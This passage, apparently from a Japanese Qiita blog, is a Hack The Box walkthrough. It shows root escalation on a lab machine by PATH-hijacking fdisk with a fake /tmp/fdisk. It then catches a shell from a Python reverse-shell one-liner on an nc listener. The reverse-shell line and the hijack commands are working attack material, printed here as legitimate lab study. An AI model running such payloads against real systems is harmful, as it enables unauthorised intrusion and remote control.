flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ssbd ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt sha_ni xsaveopt xsavec xsaves clzero arat overflow_recov succor
bugs            : fxsave_leak sysret_ss_attrs null_seg spectre_v1 spectre_v2 spec_store_bypass
bogomips        : 4000.00
TLB size        : 2560 4K pages
clflush size    : 64
cache_alignment : 64
address sizes   : 43 bits physical, 48 bits virtual
power management:


====================MEM Usage=====================
              total        used        free      shared  buff/cache   available
Mem:           3.8G        595M        1.6G         12M        1.6G        3.0G
Swap:          947M          0B        947M

Disk Infoがfdisk -lの実行の結果と同じであることがわかります。

なので以前のようにPATHをうまく使い実行されるfdiskを置き換えます。

theseus@ubuntu:/tmp$ touch fdisk
touch fdisk
theseus@ubuntu:/tmp$ echo /bin/bash > fdisk
echo /bin/bash > fdisk
theseus@ubuntu:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
theseus@ubuntu:/tmp$

これで本来のfdiskの代わりに/tmp/fdiskが実行されるはずです

root@ubuntu:/tmp# ls
ls
root@ubuntu:/tmp# cd ../root
cd ../root

なぜか出力が帰ってこないshellになってしまったのでimageに埋め込んだpythonの

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

を流用して別shellでncで受け取ります

すると

kali@kali:~$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.185] 40152
root@ubuntu:/root# ls                                                                                                                                                          
ls                                                                                                                                                                             
info.c                                                                                                                                                                         
root.txt 

これでrootが取れます

終わりに

めちゃめちゃ楽しいマシンでした!imageのexif使うあたりはかなり悩んでずっとforumでヒントを探していました。笑

fukuokaex
エンジニア/企業向けにElixirプロダクト開発・SI案件開発を支援する福岡のコミュニティ
https://fukuokaex.fun/
Why not register and get more from Qiita?
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away
Comments
No comments
Sign up for free and join this conversation.
If you already have a Qiita account
Why do not you register as a user and use Qiita more conveniently?
You need to log in to use this function. Qiita can be used more conveniently after logging in.
You seem to be reading articles frequently this month. Qiita can be used more conveniently after logging in.
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away
ユーザーは見つかりませんでした